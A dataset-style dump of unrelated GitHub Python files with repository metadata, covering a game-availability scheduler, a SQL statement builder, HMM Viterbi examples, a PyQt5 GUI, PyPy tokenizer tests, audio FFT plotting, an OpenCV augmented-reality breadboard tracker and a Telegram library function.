from config.configuration import SLEEP_TIME, REPORT_HOUR
TIMEZONE = timezone('EST')
def when_to_generate_report(now):
tomorrow = now + timedelta(1)
return datetime(tzinfo=TIMEZONE, year=tomorrow.year, month=tomorrow.month,
day=tomorrow.day, hour=REPORT_HOUR, minute=0, second=0)
def seconds_until_next_report(now):
"""Get the number of seconds until the specified hour of the day, tomorrow. """
return (when_to_generate_report(now) - now).seconds
parser = argparse.ArgumentParser("availability_checker")
parser.add_argument("--clear", help="boolean whether or not to clear the db file before checking status", type=bool)
parser.set_defaults(clear=False)
args = parser.parse_args()
availability_checker = AvailabilityChecker()
availability_checker.initialize(clear=args.clear)
# Add a jitter to the sleep time, between 1 second and 30 seconds (or the sleep time if its less than 30 seconds)
sleep_delta = randint(1, min(30, SLEEP_TIME))
sleep_time = SLEEP_TIME + sleep_delta
scheduler = sched.scheduler(time, sleep)
def check_availability(sc):
availability_checker.check_game_availability()
print("Sleeping for {} seconds... \n\n".format(sleep_time))
scheduler.enter(sleep_time, 1, check_availability, (sc,))
def get_status_report(sc):
availability_checker.send_game_status_notification()
now = datetime.now(TIMEZONE)
time_of_next_report = when_to_generate_report(now)
seconds_till_next_report = seconds_until_next_report(now)
print(f"Sleeping until next daily report at {time_of_next_report} ({int(seconds_till_next_report/60/60)} hours from now)... \n\n")
scheduler.enter(seconds_till_next_report, 1, get_status_report, (sc,))
scheduler.enter(0, 1, check_availability, (scheduler,))
scheduler.enter(0, 1, get_status_report, (scheduler,))
scheduler.run()
| colecanning/hockey_availability_trigger | run_checks.py | run_checks.py | py | 2,061 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "pytz.timezone",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "datetime.timedelta",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "config.configurati... |
34053641545 | from datetime import datetime, date
import pickle as pickle
def stringfy(value:any, dbtype)->str:
if type(value) == str:
if dbtype == 'mysql':
symbols = ['\\', "'", '"', "(", ")", "%", '&', '@', '*', '[', ']', '{', '}', '^', '!', '/', '-', '+', '?', ';', '~', '|']
for symbol in symbols:
value = value.replace(symbol, '\\'+f'{symbol}')
return f"'{value}'"
else :
symbols = ['\\', '"', "(", ")", "%", '&', '@', '*', '[', ']', '{', '}', '^', '!', '/', '-', '+', '?', ';', '~', '|']
for symbol in symbols:
value = value.replace(symbol, '\\'+f'{symbol}')
value = value.replace("'", "'"+f"'")
return f"'{value}'"
elif type(value)==datetime or type(value)==date:
return f"'{value}'"
elif value == None:
return 'Null'
else:
return f'{value}'
class CreateSql:
def __init__(self, model):
self.table_name = model.__name__
self.fields = list(model.__fields__.keys())
def get_create(self, **customType):
types = list(customType.values())
type_part = ', '.join([f'{field} {type_}' for field, type_ in zip(self.fields, types)])
sql = f'CREATE TABLE {self.table_name} ({type_part})'
print(f'create sql : \n {sql}')
return sql
class InsertSql:
def __init__(self, model):
self.table_name = model.__name__
self.fields = list(model.__fields__.keys())
def get_values_part(self, data, dbtype):
values = data.dict().values()
values_part_lst = [stringfy(value=value, dbtype=dbtype) for value in values]
values_part = ', '.join(values_part_lst)
return f'({values_part})'
def get_values_parts(self, dataset, dbtype):
values_part_lst = [self.get_values_part(data=i, dbtype=dbtype) for i in dataset]
values_part = ', '.join(values_part_lst)
return values_part
def get_insert(self, data, dbtype='mysql'):
values_part = self.get_values_part(data=data, dbtype=dbtype)
fields_part = ', '.join(self.fields)
sql = f'INSERT INTO {self.table_name} ({fields_part}) VALUES{values_part}'
print(f'insert sql : \n {sql}')
return sql
def get_dump(self, dataset, dbtype='mysql'):
values_parts = self.get_values_parts(dataset=dataset, dbtype=dbtype)
fields_part = ', '.join(self.fields)
sql = f'INSERT INTO {self.table_name} ({fields_part}) VALUES{values_parts}'
print(f'dump sql : \n {sql[:250]}')
return sql
| ajcltm/Isql_v2 | Isql_v2/sql.py | sql.py | py | 2,592 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.datetime",
"line_number": 18,
"usage_type": "name"
},
{
"api_name": "datetime.date",
"line_number": 18,
"usage_type": "name"
}
] |
15655252113 | # -*- coding: utf-8 -*-
"""
Created on Sat Oct 13 17:04:34 2018
@author: ecupl
"""
import numpy as np
import pandas as pd
import os,copy
import matplotlib.pyplot as plt
#######################
# #
# HMM最优路径 #
# #
#######################
os.chdir(r"D:\mywork\test")
'''1、近似算法'''
#初始准备
startP = np.array([[0.63,0.17,0.20]])
transformP = np.array([[0.5,0.375,0.125],[0.25,0.125,0.625],[0.25,0.375,0.375]])
observeP = np.array([[0.6,0.2,0.15,0.05],[0.25,0.25,0.25,0.25],[0.05,0.1,0.35,0.5]])
stateArray = ["晴天","阴天","雨天"]
observeArray = ["干旱","干燥","湿润","潮湿"]
#开始循环计算
stateResult = []
observeResult = ["干旱","干燥","潮湿"]
for idx in range(len(observeResult)):
stateDict = {}
if idx==0:
observeIdx = observeArray.index(observeResult[idx])
stateP = np.multiply(startP,observeP[:,observeIdx])
state = stateArray[np.argmax(stateP)]
else:
for i in stateResult[idx-1].values():
stateForward = i
observeIdx = observeArray.index(observeResult[idx])
stateP = np.multiply(np.dot(stateForward,transformP),observeP[:,observeIdx])
state = stateArray[np.argmax(stateP)]
stateDict[state] = stateP
stateResult.append(stateDict)
'''2、Vertibi维特比算法'''
def vertibi(observeResult,startP,transformP,observeP,stateArray,observeArray):
'''
observeResult:实际观测结果
startP:初始概率
transformP:状态转移概率
observeP:观测发射概率
stateArray:状态序列
observeArray:观测序列
'''
stateP = [] #初始化状态概率
state = [] #初始化状态情况
for idx in range(len(observeResult)):
statePdict = dict()
statedict = dict()
if idx==0:
observeIdx = observeArray.index(observeResult[idx])
tempstateP = np.multiply(startP,observeP[:,observeIdx]).reshape(-1)
else:
stateForwardP = np.array(list(stateP[idx-1].values())).reshape(-1,1)
observeIdx = observeArray.index(observeResult[idx])
statePro = np.multiply(stateForwardP,transformP).max(axis=0)
tempstateP = np.multiply(statePro,observeP[:,observeIdx])
print(statePro,observeP[:,observeIdx])
for i in range(len(tempstateP)):
statePdict[stateArray[i]] = tempstateP[i]
statedict[observeResult[idx]] = stateArray[np.argmax(tempstateP)]
stateP.append(statePdict),state.append(statedict)
print(state,stateP)
#######################
# #
# HMM词性标注 #
# #
#######################
import jieba
'''不带词性'''
sen = jieba.cut("把这篇报道修改一下")
for x in sen:
print(x)
'''带词性'''
import jieba.posseg
sen2 = jieba.posseg.cut("把这篇报道修改一下")
for i in sen2:
print(i.word,i.flag)
| shoucangjia1qu/Machine-Learnning1 | Machine Learning 0217 charpter11.py | Machine Learning 0217 charpter11.py | py | 2,970 | python | en | code | 6 | github-code | 36 | [
{
"api_name": "os.chdir",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 23,... |
7666619166 | from PyQt5 import QtWidgets, QtCore, QtGui
from UI import Ui_MainWindow
import sys
import images
import core
from database import SessionLocal, engine
from models import APP, Group, Function
# 创建数据库表
APP.metadata.create_all(bind=engine)
Group.metadata.create_all(bind=engine)
Function.metadata.create_all(bind=engine)
class MainWindow(QtWidgets.QMainWindow):
def __init__(self):
super().__init__()
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
# 连接ComboBox的currentIndexChanged信号到change_combox2方法
self.ui.comboBox.currentIndexChanged.connect(self.change_combox2)
# 连接ComboBox_2的currentIndexChanged信号到change_combox3方法
self.ui.comboBox_2.currentIndexChanged.connect(self.change_combox3)
def change_combox2(self):
# 先清空comboBox_2以及comboBox_3中的数据
self.ui.comboBox_2.clear()
self.ui.comboBox_3.clear()
core.comboBox_2_function(self.ui)
def change_combox3(self):
# 先清空comboBox_3中的数据
self.ui.comboBox_3.clear()
core.comboBox_3_function(self.ui)
def closeEvent(self, event):
try:
reply = QtWidgets.QMessageBox.question(self, '提醒', "是否要退出程序?",
QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No,
QtWidgets.QMessageBox.No)
if reply == QtWidgets.QMessageBox.Yes:
event.accept()
print("主窗口已关闭")
else:
event.ignore()
except Exception as e:
print(e)
if __name__ == "__main__":
QtCore.QCoreApplication.setAttribute(QtCore.Qt.AA_EnableHighDpiScaling) # 解决高分辨率问题(网上搜的,暂未发现,如果发现有问题可以试试这条)
app = QtWidgets.QApplication(sys.argv)
widget = MainWindow()
ui = widget.ui
# ui = Ui_MainWindow()
# ui.setupUi(widget)
widget.setWindowTitle("API-Explorer v1.0")
widget.setWindowIcon(QtGui.QIcon(":/icon.ico"))
widget.show()
core.key_function(ui)
core.comboBox_function(ui)
sys.exit(app.exec_())
| mrknow001/API-Explorer | main.py | main.py | py | 2,246 | python | en | code | 29 | github-code | 36 | [
{
"api_name": "models.APP.metadata.create_all",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "models.APP.metadata",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "models.APP",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "da... |
43296470854 | import pytest
from pypy.interpreter.pyparser import pytokenizer
from pypy.interpreter.pyparser.parser import Token
from pypy.interpreter.pyparser.pygram import tokens
from pypy.interpreter.pyparser.error import TokenError
def tokenize(s):
return pytokenizer.generate_tokens(s.splitlines(True) + ["\n"], 0)
def check_token_error(s, msg=None, pos=-1, line=-1):
error = pytest.raises(TokenError, tokenize, s)
if msg is not None:
assert error.value.msg == msg
if pos != -1:
assert error.value.offset == pos
if line != -1:
assert error.value.lineno == line
class TestTokenizer(object):
def test_simple(self):
line = "a+1"
tks = tokenize(line)
assert tks == [
Token(tokens.NAME, 'a', 1, 0, line),
Token(tokens.PLUS, '+', 1, 1, line),
Token(tokens.NUMBER, '1', 1, 2, line),
Token(tokens.NEWLINE, '', 2, 0, '\n'),
Token(tokens.NEWLINE, '', 2, 0, '\n'),
Token(tokens.ENDMARKER, '', 2, 0, ''),
]
def test_error_parenthesis(self):
for paren in "([{":
check_token_error(paren + "1 + 2",
"parenthesis is never closed",
1)
for paren in ")]}":
check_token_error("1 + 2" + paren,
"unmatched '%s'" % (paren, ),
6)
for i, opening in enumerate("([{"):
for j, closing in enumerate(")]}"):
if i == j:
continue
check_token_error(opening + "1\n" + closing,
"closing parenthesis '%s' does not match opening parenthesis '%s' on line 1" % (closing, opening),
pos=1, line=2)
check_token_error(opening + "1" + closing,
"closing parenthesis '%s' does not match opening parenthesis '%s'" % (closing, opening),
pos=3, line=1)
check_token_error(opening + closing,
"closing parenthesis '%s' does not match opening parenthesis '%s'" % (closing, opening),
pos=2, line=1)
def test_unknown_char(self):
check_token_error("?", "Unknown character", 1)
def test_eol_string(self):
check_token_error("x = 'a", pos=5, line=1)
def test_eof_triple_quoted(self):
check_token_error("'''", pos=1, line=1)
| mozillazg/pypy | pypy/interpreter/pyparser/test/test_pytokenizer.py | test_pytokenizer.py | py | 2,472 | python | en | code | 430 | github-code | 36 | [
{
"api_name": "pypy.interpreter.pyparser.pytokenizer.generate_tokens",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "pypy.interpreter.pyparser.pytokenizer",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "pytest.raises",
"line_number": 11,
"usage_type"... |
22082345466 | #coding=utf-8
import cv2
import numpy as np
import scipy.signal as sp
from scipy import stats
import math
import os
def nothing(*arg):
pass
def get_video():
#address = "http://admin:admin@10.189.149.245:8081" ; locate_method = 4
address = "pictures/video.mp4" ; locate_method = 1
#address = 0 ; locate_method = 4
#res = 1 #low resolution, 400*300
res = 2 #median resolution, 640*480
#res = 3 #high resolution, 960*720
video =cv2.VideoCapture(address)
cv2.namedWindow("breadboard")
cv2.createTrackbar('X_position','breadboard',300,600,nothing)
cv2.createTrackbar('Y_position','breadboard',30,120,nothing)
cv2.createTrackbar('Zoom','breadboard',30,50,nothing)
return video, locate_method, res
class OBJ:
def __init__(self, filename, swapyz=False):
"""Loads a Wavefront OBJ file. """
self.vertices = []
self.normals = []
self.texcoords = []
self.faces = []
material = None
for line in open(filename, "r"):
if line.startswith('#'): continue
values = line.split()
if not values: continue
if values[0] == 'v':
v = list(map(float, values[1:4]))
if swapyz:
v = v[0], v[2], v[1]
self.vertices.append(v)
elif values[0] == 'vn':
v = list(map(float, values[1:4]))
if swapyz:
v = v[0], v[2], v[1]
self.normals.append(v)
elif values[0] == 'vt':
self.texcoords.append(list(map(float, values[1:3])))
#elif values[0] in ('usemtl', 'usemat'):
#material = values[1]
#elif values[0] == 'mtllib':
#self.mtl = MTL(values[1])
elif values[0] == 'f':
face = []
texcoords = []
norms = []
for v in values[1:]:
w = v.split('/')
face.append(int(w[0]))
if len(w) >= 2 and len(w[1]) > 0:
texcoords.append(int(w[1]))
else:
texcoords.append(0)
if len(w) >= 3 and len(w[2]) > 0:
norms.append(int(w[2]))
else:
norms.append(0)
#self.faces.append((face, norms, texcoords, material))
self.faces.append((face, norms, texcoords))
def kernel(kernel_size = 15):
kernel = np.ones([kernel_size,kernel_size])
kernel/=kernel_size**2
return kernel
def drawlines(img, rho, theta):
a = np.cos(theta)
b = np.sin(theta)
x0 = a*rho
y0 = b*rho
x1 = int(x0 + 2000*(-b))
y1 = int(y0 + 2000*(a))
x2 = int(x0 - 2000*(-b))
y2 = int(y0 - 2000*(a))
cv2.line(img,(x1,y1),(x2,y2),(255,255,255),2)
def findcorners(img, rho1, rho2, theta, par2):
coordinate_tem = np.zeros([4,2])
coordinate = np.zeros([4,2])
rho4 = 0.25*rho1 + 0.75*rho2
rho3 = 0.25*rho2 + 0.75*rho1
a = np.cos(theta)
b = np.sin(theta)
x03 = a*rho3
y03 = b*rho3
x04 = a*rho4
y04 = b*rho4
x10 = int(par2/4)
x20 = int(3*par2/4)
y103 = int(y03 + (x10-x03)*(a)/(-b))
y104 = int(y04 + (x10-x04)*(a)/(-b))
y203 = int(y03 + (x20-x03)*(a)/(-b))
y204 = int(y04 + (x20-x04)*(a)/(-b))
x1 = x10
y13 = int(y03 + (x1-x03)*(a)/(-b))
y14 = int(y04 + (x1-x04)*(a)/(-b))
x2 = x20
y23 = int(y03 + (x2-x03)*(a)/(-b))
y24 = int(y04 + (x2-x04)*(a)/(-b))
#left up
while img[y13][x1]==255.:
x1-=10
y13 = int(y03 + (x1-x03)*(a)/(-b))
x1-=10
if img[y13][x1]==0:
x1+=11
y13 = int(y03 + (x1-x03)*(a)/(-b))
while img[y13][x1]==0:
x1+=1
y13 = int(y03 + (x1-x03)*(a)/(-b))
else:
print("error in left up")
coordinate_tem[0][0] = x1
coordinate_tem[0][1] = y13
#left down
x1 = x10
while img[y14][x1]==255:
x1-=10
y14 = int(y04 + (x1-x04)*(a)/(-b))
x1-=10
if img[y14][x1]==0:
x1+=11
y14 = int(y04 + (x1-x04)*(a)/(-b))
while img[y14][x1]==0:
x1+=1
y14 = int(y04 + (x1-x04)*(a)/(-b))
else:
print("error in left down")
coordinate_tem[1][0] = x1
coordinate_tem[1][1] = y14
#right up
while img[y23][x2]==255:
x2+=10
y23 = int(y03 + (x2-x03)*(a)/(-b))
x2+=10
if img[y23][x2]==0:
x2-=11
y23 = int(y03 + (x2-x03)*(a)/(-b))
while img[y23][x2]==0:
x2-=1
y23 = int(y03 + (x2-x03)*(a)/(-b))
else:
print("error in right up")
coordinate_tem[3][0] = x2
coordinate_tem[3][1] = y23
#right down
x2 = x20
while img[y24][x2]==255:
x2+=10
y24 = int(y04 + (x2-x04)*(a)/(-b))
x2+=10
if img[y24][x2]==0:
x2-=11
y24 = int(y04 + (x2-x04)*(a)/(-b))
while img[y24][x2]==0:
x2-=1
y24 = int(y04 + (x2-x04)*(a)/(-b))
else:
print("error in right down")
coordinate_tem[2][0] = x2
coordinate_tem[2][1] = y24
coordinate[0][0] = 1.5*coordinate_tem[0][0] - 0.5*coordinate_tem[1][0]
coordinate[0][1] = 1.5*coordinate_tem[0][1] - 0.5*coordinate_tem[1][1]
coordinate[1][0] = 1.5*coordinate_tem[1][0] - 0.5*coordinate_tem[0][0]
coordinate[1][1] = 1.5*coordinate_tem[1][1] - 0.5*coordinate_tem[0][1]
coordinate[3][0] = 1.5*coordinate_tem[3][0] - 0.5*coordinate_tem[2][0]
coordinate[3][1] = 1.5*coordinate_tem[3][1] - 0.5*coordinate_tem[2][1]
coordinate[2][0] = 1.5*coordinate_tem[2][0] - 0.5*coordinate_tem[3][0]
coordinate[2][1] = 1.5*coordinate_tem[2][1] - 0.5*coordinate_tem[3][1]
return coordinate
def calibrate(image, res):
print("auto-calibration")
img = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
img = cv2.Canny(img, 100, 100)
G7 = kernel(7)
G9 = kernel(9)
if res == 1:
img= sp.convolve2d(img, G7, mode='same', boundary='symm')
img= sp.convolve2d(img, G7, mode='same', boundary='symm')
img = np.where(img > 40, 255., 0.)
(par1, par2, par3) = (4, 400, 300)
elif res == 2:
img= sp.convolve2d(img, G7, mode='same', boundary='symm')
img= sp.convolve2d(img, G7, mode='same', boundary='symm')
img= sp.convolve2d(img, G7, mode='same', boundary='symm')
img = np.where(img > 30, 255., 0.)
(par1, par2, par3) = (8, 640, 480)
elif res == 3:
img= sp.convolve2d(img, G9, mode='same', boundary='symm')
img= sp.convolve2d(img, G9, mode='same', boundary='symm')
img= sp.convolve2d(img, G9, mode='same', boundary='symm')
img= sp.convolve2d(img, G9, mode='same', boundary='symm')
img = np.where(img > 20, 255., 0.)
(par1, par2, par3) = (9, 960, 720)
tem1 = img
img = np.float32(img)
dst = cv2.cornerHarris(img,2,3,0.01)
dst = cv2.dilate(dst,None)
img = np.where(dst>0.001*dst.max(), 255, 0)
img = img.astype('uint8')
img = cv2.Canny(img, 230, 250)
threshold = 250
count = [0]
while count[0]<par1:
lines = cv2.HoughLines(img,1,np.pi/180,threshold)
if not lines is None:
theta = lines[:,0,1]
mode, count = stats.mode(theta)
threshold-=10
theta = mode[0]
lines = lines[lines[:,0,1]==theta]
lines = lines[lines[:,0,0].argsort()]
#draw long edges
#drawlines(img, lines[0,0,0], lines[0,0,1])
#drawlines(img, lines[len(lines)-1,0,0], lines[len(lines)-1,0,1])
#find corners
loc = findcorners(tem1, lines[0,0,0], lines[len(lines)-1,0,0], theta, par2)
par4 = min(loc[0][0],loc[0][1],(loc[1][1]-loc[0][1])/2,50)
bbox1 = (loc[0][0]-par4, loc[0][1]-par4, 2*par4, 2*par4)
par4 = min(loc[1][0],par3-loc[1][1],(loc[1][1]-loc[0][1])/2,50)
bbox2 = (loc[1][0]-par4, loc[1][1]-par4, 2*par4, 2*par4)
par4 = min(par2-loc[2][0],par3-loc[2][1],(loc[2][1]-loc[3][1])/2,50)
bbox3 = (loc[2][0]-par4, loc[2][1]-par4, 2*par4, 2*par4)
par4 = min(par2-loc[3][0],loc[3][1],(loc[2][1]-loc[3][1])/2,50)
bbox4 = (loc[3][0]-par4, loc[3][1]-par4, 2*par4, 2*par4)
tracker = cv2.MultiTracker_create()
tracker.add(cv2.TrackerKCF_create(), image, bbox1)
tracker.add(cv2.TrackerKCF_create(), image, bbox2)
tracker.add(cv2.TrackerKCF_create(), image, bbox3)
tracker.add(cv2.TrackerKCF_create(), image, bbox4)
boxes = [bbox1, bbox2, bbox3, bbox4]
return tracker, boxes
def track(image, tracker):
timer = cv2.getTickCount()
ok, boxes = tracker.update(image)
fps = cv2.getTickFrequency() / (cv2.getTickCount() - timer)
cv2.putText(image, "FPS : " + str(int(fps)), (10,60), \
cv2.FONT_HERSHEY_SIMPLEX, 0.75, (50,170,50), 2)
cv2.putText(image, "Tracking, KCF tracker", (10,30), \
cv2.FONT_HERSHEY_SIMPLEX, 0.75, (50,170,50), 2)
return boxes
def manual_calibrate(image):
cv2.putText(image, "Manually calibrating", (10,30), \
cv2.FONT_HERSHEY_SIMPLEX, 0.75, (50,170,50), 2)
bbox1 = cv2.selectROI('breadboard', image)
bbox2 = cv2.selectROI('breadboard', image)
bbox3 = cv2.selectROI('breadboard', image)
bbox4 = cv2.selectROI('breadboard', image)
tracker = cv2.MultiTracker_create()
tracker.add(cv2.TrackerKCF_create(), image, bbox1)
tracker.add(cv2.TrackerKCF_create(), image, bbox2)
tracker.add(cv2.TrackerKCF_create(), image, bbox3)
tracker.add(cv2.TrackerKCF_create(), image, bbox4)
boxes = [bbox1, bbox2, bbox3, bbox4]
return tracker, boxes
def display(image, boxes):
if boxes[0][0]:
for box in boxes:
p1 = int(box[0] + 0.5*box[2])
p2 = int(box[1] + 0.5*box[3])
cv2.circle(image, (p1, p2), 5, (0,0,255), -1)
else:
pass
image=cv2.resize(image,(640,480),interpolation=cv2.INTER_CUBIC)
cv2.imshow("breadboard",image)
def AR(frame, boxes, loc):
coordinate = np.zeros([4,2])
if boxes[0][0]:
for i in range(4):
coordinate[i][0] = boxes[i][0]+0.5*boxes[i][2]
coordinate[i][1] = boxes[i][1]+0.5*boxes[i][3]
srcpoints = np.float32(coordinate).reshape(-1, 1, 2)
canvaspoints = np.float32([[0,0],[0,119],[599,119],[599,0]]).reshape(-1, 1, 2)
homography, mask = cv2.findHomography(canvaspoints, srcpoints, cv2.RANSAC, 5.0)
#frame = cv2.polylines(frame, [np.int32(coordinate)], True, 255, 2, cv2.LINE_AA)
else:
homography = None
if homography is not None:
camera_parameters = np.array([[520, 0, loc[0]], [0, 520, loc[1]], [0, 0, 1]])
projection = projection_matrix(camera_parameters, homography)
dir_name = os.getcwd()
obj = OBJ(os.path.join(dir_name, 'models/resistor.obj'), swapyz=True)
frame = render(frame, obj, projection, loc)
def render(img, obj, projection, loc, color=False):
"""
Render a loaded obj model into the current video frame
"""
vertices = obj.vertices
scale_matrix = np.eye(3) * loc[2]
for face in obj.faces:
face_vertices = face[0]
points = np.array([vertices[vertex - 1] for vertex in face_vertices])
points = np.dot(points, scale_matrix)
# render model in the middle of the reference surface. To do so,
# model points must be displaced
points = np.array([[p[2]+loc[0],p[0]+loc[1],p[1]] for p in points])
dst = cv2.perspectiveTransform(points.reshape(-1, 1, 3), projection)
imgpts = np.int32(dst)
if color is False:
cv2.fillConvexPoly(img, imgpts, (137, 27, 211))
else:
color = hex_to_rgb(face[-1])
color = color[::-1] # reverse
cv2.fillConvexPoly(img, imgpts, color)
return img
def projection_matrix(camera_parameters, homography):
"""
From the camera calibration matrix and the estimated homography
compute the 3D projection matrix
"""
# Compute rotation along the x and y axis as well as the translation
homography = homography * (-1)
rot_and_transl = np.dot(np.linalg.inv(camera_parameters), homography)
col_1 = rot_and_transl[:, 0]
col_2 = rot_and_transl[:, 1]
col_3 = rot_and_transl[:, 2]
# normalise vectors
l = math.sqrt(np.linalg.norm(col_1, 2) * np.linalg.norm(col_2, 2))
rot_1 = col_1 / l
rot_2 = col_2 / l
translation = col_3 / l
# compute the orthonormal basis
c = rot_1 + rot_2
p = np.cross(rot_1, rot_2)
d = np.cross(c, p)
rot_1 = np.dot(c/np.linalg.norm(c,2)+d/np.linalg.norm(d,2),1/math.sqrt(2))
rot_2 = np.dot(c/np.linalg.norm(c,2)-d/np.linalg.norm(d,2),1/math.sqrt(2))
rot_3 = np.cross(rot_1,rot_2)
projection = np.stack((rot_1, rot_2, rot_3, translation)).T
return np.dot(camera_parameters, projection)
def hex_to_rgb(hex_color):
"""
Helper function to convert hex strings to RGB
"""
hex_color = hex_color.lstrip('#')
h_len = len(hex_color)
return tuple(int(hex_color[i:i+h_len//3],16) \
for i in range(0,h_len,h_len//3))
if __name__ == '__main__':
video, locate_method, res = get_video()
(num, operation, boxes) = (0, 1, [[[]]])
time = cv2.getTickCount()
ok, frame1 = video.read()
#if True:
while True:
ok, frame = video.read()
#frame = cv2.flip(frame, -1)
#frame = frame1
if not ok:
print('No video')
break
X_pos = cv2.getTrackbarPos('X_position','breadboard')
Y_pos = cv2.getTrackbarPos('Y_position','breadboard')
Zoom = 0.1*cv2.getTrackbarPos('Zoom','breadboard')
location_parameters = (X_pos, Y_pos, Zoom)
#choose resolution from low, median, high
if res == 1:
frame=cv2.resize(frame,(400,300),interpolation=cv2.INTER_CUBIC)
elif res == 2:
frame=cv2.resize(frame,(640,480),interpolation=cv2.INTER_CUBIC)
elif res == 3:
frame=cv2.resize(frame,(960,720),interpolation=cv2.INTER_CUBIC)
#choose locating method from aotu, maunal, and track
if locate_method == 1:
#auto-calibrate
try:
tracker, boxes = calibrate(frame, res)
locate_method = 2
except:
print("calibrate fail, re-calibrating")
time = cv2.getTickCount()
elif locate_method == 2:
#track
boxes = track(frame, tracker)
elif locate_method == 3:
#manually calibrate
tracker, boxes = manual_calibrate(frame)
locate_method = 2
time = cv2.getTickCount()
if operation == 1:
AR(frame, boxes, location_parameters)
display(frame, boxes)
#auto calibrate for every 5 seconds
if (cv2.getTickCount()-time)//cv2.getTickFrequency() >= 5:
if locate_method == 2:
time = cv2.getTickCount()
locate_method = 1
#deal with keyboard
key = cv2.waitKey(1) & 0xFF
if key == 27:
#press esc to escape
print("esc break...")
break
elif key == ord(' '):
print("Pause")
key = cv2.waitKey(0) & 0xFF
if key == ord('s'):
print("save current frame")
num = num+1
filename = "frames_%s.jpg" % num
cv2.imwrite(filename, frame)
if key == ord('m'):
print("manual calibration")
locate_method = 3
if key == ord('c'):
locate_method = 1
elif key == ord('m'):
print("manual calibration")
locate_method = 3
elif key == ord('c'):
locate_method = 1
video.release()
cv2.destroyWindow("breadboard")
| Hao-Wang-Henry/Augmented-Reality-Circuit-Learning | final code with AR.py | final code with AR.py | py | 16,471 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "cv2.VideoCapture",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "cv2.namedWindow",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "cv2.createTrackbar",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "cv2.createTrackba... |
30589096561 | """mse_home.log module."""
import logging
LOGGER = logging.getLogger("mse")
def setup_logging(debug: bool = False):
"""Configure basic logging."""
logging.basicConfig(format="%(message)s")
LOGGER.setLevel(logging.DEBUG if debug else logging.INFO)
| Cosmian/mse-home-cli | mse_home/log.py | log.py | py | 263 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "logging.basicConfig",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "logging.INFO"... |
6733216231 | import seaborn as sbn
import numpy as np
import matplotlib.pylab as plt
import scipy as sci
from scipy.io import wavfile
sr, aud_array = wavfile.read(r'C:\Users\jackk\OneDrive - South East Technological University (Waterford Campus)\college backup\semester 7\Digital Signal Processing\mini project\python files\vivaldi_V1.wav')
time = len(aud_array)/sr
x = np.linspace(0,time,len(aud_array))
#print(np.shape(aud_array))
if 0:
plt.plot(x, aud_array,)
plt.xlabel("time (s)"); plt.ylabel("Amplitude")
plt.show()
if 0:
#for i in range(0,2):
aud_array[:,1] = abs(np.fft.fft(aud_array[:,1]))
plt.plot(aud_array[:,1])
plt.show()
#frequency domain
if 1:
sig0 = aud_array[:,0]
sig0 = abs(np.fft.fft(sig0/len(sig0)))
sig1 = aud_array[:,1]
sig1 = abs(np.fft.fft(sig1/len(sig1)))
freqax = sci.fftpack.fftfreq(len(sig1),1.0/sr) #look into this
plt.plot(freqax, 20*np.log10(sig0), label = 'channel 1')
# plt.plot(freqax, 20*np.log10(sig1), label = 'channel 2')
plt.xlabel("Frequency (Hz)"); plt.ylabel("Amplitude (dB)")
plt.legend(loc="upper left")
#plt.yscale("log")
plt.show()
#own attempt of freq domain
if 0:
sig0 = aud_array[:,0]
sig0 = abs(np.fft.fft(sig0/len(sig0)))
sig1 = aud_array[:,1]
sig1 = abs(np.fft.fft(sig1/len(sig1)))
freqax = np.linspace(-sr/2,sr/2,len(sig0))
plt.plot(freqax, sig0)
#plt.plot(freqax, sig1)
#plt.yscale("log")
plt.show()
print(freqax)
| jackkelly247/DSP | first steps parsing wav file.py | first steps parsing wav file.py | py | 1,539 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "scipy.io.wavfile.read",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "scipy.io.wavfile",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "numpy.linspace",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "matplotlib.pylab.... |
31061791335 |
from ..utils import Object
class RemoveAllFilesFromDownloads(Object):
"""
Removes all files from the file download list
Attributes:
ID (:obj:`str`): ``RemoveAllFilesFromDownloads``
Args:
only_active (:obj:`bool`):
Pass true to remove only active downloads, including paused
only_completed (:obj:`bool`):
Pass true to remove only completed downloads
delete_from_cache (:obj:`bool`):
Pass true to delete the file from the TDLib file cache
Returns:
Ok
Raises:
:class:`telegram.Error`
"""
ID = "removeAllFilesFromDownloads"
def __init__(self, only_active, only_completed, delete_from_cache, extra=None, **kwargs):
self.extra = extra
self.only_active = only_active # bool
self.only_completed = only_completed # bool
self.delete_from_cache = delete_from_cache # bool
@staticmethod
def read(q: dict, *args) -> "RemoveAllFilesFromDownloads":
only_active = q.get('only_active')
only_completed = q.get('only_completed')
delete_from_cache = q.get('delete_from_cache')
return RemoveAllFilesFromDownloads(only_active, only_completed, delete_from_cache)
| iTeam-co/pytglib | pytglib/api/functions/remove_all_files_from_downloads.py | remove_all_files_from_downloads.py | py | 1,245 | python | en | code | 20 | github-code | 36 | [
{
"api_name": "utils.Object",
"line_number": 6,
"usage_type": "name"
}
] |
15958493126 | import os
from itertools import product
import re
from numpy import append, array, bincount, diff, ma, sort #cumsum, nditer, roll, setdiff1d, where
from numpy import product as np_prod
